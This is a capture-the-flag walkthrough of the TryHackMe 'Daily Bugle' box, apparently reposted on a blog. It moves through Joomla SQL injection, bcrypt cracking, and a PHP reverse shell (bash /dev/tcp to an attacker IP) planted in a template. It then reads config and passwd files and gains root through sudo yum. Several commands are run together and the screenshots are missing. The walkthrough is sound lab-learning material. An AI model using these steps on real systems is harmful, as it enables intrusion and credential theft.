Tryhackme:Daily bugle_CTF

[Enumeration]

  1. Port scan
nmap -Pn <ip>

There’re 3 ports: 22,80, and 3306.

Image for post

Image for post

2. OS and service scan

nmap -A -p 22,80,3306 <ip>

This machine is CentOS.

Image for post

Image for post

3. Vuln scan

nmap --script vuln -p 22,80,3306 <ip>
Image for post

Image for post

This machine has Joomla 3.7.0 ,which has SQLi vulnerability.

Image for post

Image for post

4. Access HTTP site.

There’s news of Spiderman robbing the bank.

Image for post

Image for post

View page source, nothing.

Image for post

Image for post

From #3, let’s access /administrator

Image for post

Image for post

5. Search for default credential.

I only have “admin” without any password.

Image for post

Image for post

6. Search for exploits

searchsploit joomla 3.7.0

There’re SQLi and XSS.

Read XSS. It’s CVE-2017–8917 and sqlmap usage, but U will search for python script instead.

Image for post

Image for post


[Exploitation]

  1. After searching with google, I came across to this.

stefanlucas/Exploit-Joomla

CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0 - stefanlucas/Exploit-Joomla

github.com

python joomblah.py http://<ip>

Now I have a username, jonah, and password hash.

Image for post

Image for post

2. Cracking password

Using example hash guide

example_hashes [hashcat wiki]

If you get a "line length exception" error in hashcat, it is often because the hash mode that you have requested does…

hashcat.net

The hash may be bcrypt.

Image for post

Image for post

I will use hashcat on windows for better formance.

Save hash in text file as daily-bugle.txt.

Image for post

Image for post

Use hashcat

hashcat.exe -m 3200 daily-bugle.txt rockyou.txt

Now I have a password for joomla.

Image for post

Image for post

3. Login to Joomla

Image for post

Image for post

Now I have a dashboard.

Image for post

Image for post

4. Reverse shell

I will use this guide to get reverse shell.

Joomla: Reverse Shell

Joomla is one of the popular Content Management System (CMS) which helps you to build your website. Joomla has gained…

laptrinhx.com

Click “Templates”.

Image for post

Image for post

Select first template

Image for post

Image for post

Select index.php

Image for post

Image for post

Prepare listener on port 1234

nc -lvp 1234
Image for post

Image for post

Prepare reverse shell

exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'");

Inject with reverse shell

Image for post

Image for post

Click Template review

Image for post

Image for post

Now I have a shell.

Image for post

Image for post


[Privilege Escalation]

  1. Verify user
id

I’m apache.

Image for post

Image for post

2. Normally most CMS have credential in config file. Let’s get it in case I need somewhere else.

ls cat configuration.php

I have a new credential. I can use it somewhere.

Image for post

Image for post

3. Verify users

cat /etc/passwd

This machine has 2 users: root and jjameson.

Image for post

Image for post

4. Login as jjameson

Try to login with joomla credential

su jjameson

Failed!!!

Image for post

Image for post

Try to login with credential from config file

su jjamesonid

Success!!!

Image for post

Image for post

5. Verify sudo

There’s yum command.

Image for post

Image for post

Following GTFOBins. There’re 2 ways of exploiting

yum | GTFOBins

It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated…

gtfobins.github.io

Let’s try first set of commands

Image for post

Image for post

Failed!!!

Image for post

Image for post

Let’s try these instead

Image for post

Image for post

Image for post

Image for post

6. Read user.txt

Now I’m root. Let’s get the answer for this box

cd /home/jjamesonlscat user.txt
Image for post

Image for post

cd /rootlscat root.txt
Image for post

Image for post

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud

您是第8237918 位访客, 您的IP是:[35.168.62.171]